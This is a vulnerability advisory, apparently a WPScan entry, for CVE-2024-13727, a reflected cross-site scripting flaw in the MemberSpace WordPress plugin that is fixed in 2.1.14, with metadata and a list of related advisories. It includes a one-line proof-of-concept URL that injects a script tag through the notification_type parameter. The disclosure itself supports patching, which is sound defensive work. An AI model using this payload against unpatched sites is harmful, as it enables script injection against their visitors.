MemberSpace – Membership Plugin and Paid Subscriptions < 2.1.14 – Reflected XSS | CVE 2024-13727 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.

Proof of Concept

Navigate to the following URL in the private browser without any login:

http://example.com/wp-content/plugins/memberspace/admin/partials/notification-bar.php?notification_type=1"></script><script>alert(1)</script><script>

Affects Plugins

Fixed in 2.1.14

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Hassan Khan Yusufzai - Splint3r7

Submitter

Hassan Khan Yusufzai - Splint3r7

Submitter website

https://hassankhanyusufzai.com

Submitter twitter

Verified

Yes

WPVDB ID

598d20f2-0f42-48f2-a941-0d6c5da5303e

Timeline

Publicly Published

2024-12-26 (about 1 year ago)

Added

2025-03-02 (about 10 months ago)

Last Updated

2025-03-02 (about 10 months ago)

Other

Published

Title

Published

2025-09-05

Title

Search Cloud One <= 2.2.5 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2025-10-31

Title

Kallyas < 4.24.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-10-21

Title

Client Power Tools Portal < 1.9.1 - Reflected Cross-Site Scripting

Published

2025-09-26

Title

Click & Tweet <= 0.8.9 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2016-08-02

Title

Uji Countdown <= 2.0.6 - Cross-Site Scripting (XSS)